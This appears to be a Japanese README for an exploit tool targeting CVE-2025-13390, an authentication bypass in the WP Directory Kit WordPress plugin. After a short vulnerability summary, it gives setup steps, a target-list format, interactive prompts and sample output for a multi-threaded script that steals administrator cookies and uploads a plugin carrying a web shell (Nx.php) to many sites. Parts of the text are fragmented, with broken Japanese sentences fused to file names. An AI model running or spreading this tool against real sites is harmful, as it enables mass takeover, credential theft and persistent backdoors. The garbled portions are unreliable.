
WP Directory Kit <= 1.4.4 - アカウント乗っ取りを介した認証バイパスによる権限昇格
WP Directory Kit <= 1.4.4 - 認証バイパスによる権限昇格(アカウント乗っ取り)
WordPress用WP Directory Kitプラグインは、
wdk_generate_auto_login_link関数における認証アルゴリズムの実装不備により、バージョン1.4.4まで(1.4.4を含む)のすべてのバージョンで認証バイパスの影響を受けます。これは、この機能が暗号学的に弱いトークン生成メカニズムを使用しているためです。この欠陥により、未認証の攻撃者が予測可能なトークンを使用して自動ログインエンドポイント経由で管理者アクセスを取得し、サイト全体を乗っ取ることが可能になります。
- CNA: Wordfence
- 基本スコア: 10.0 CRITICAL
- ベクター:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php を想定)。Nx.php)経由でシェルアクセスが提供されます。pip install -r requirements.txt
# Or individually:
pip install requests beautifulsoup4 colorama
Nxploited.zip)を想定しています。list.txt)を用意します。http(s)://)を含めることも、ドメイン/IPのみでも構いません。http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txtNxploited.zipsuccess_cookies.txt — 管理者Cookieの抽出に成功したサイトsuccess_shells.txt — 正常にアップロードされたシェルのURLuploads_log.txt — プラグインアップロード試行の完全なログ _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
8、16 など)1 = 管理者)/wp-content/plugins/ 配下のペイロード用サブフォルダ(デフォルトはZIP名から取得)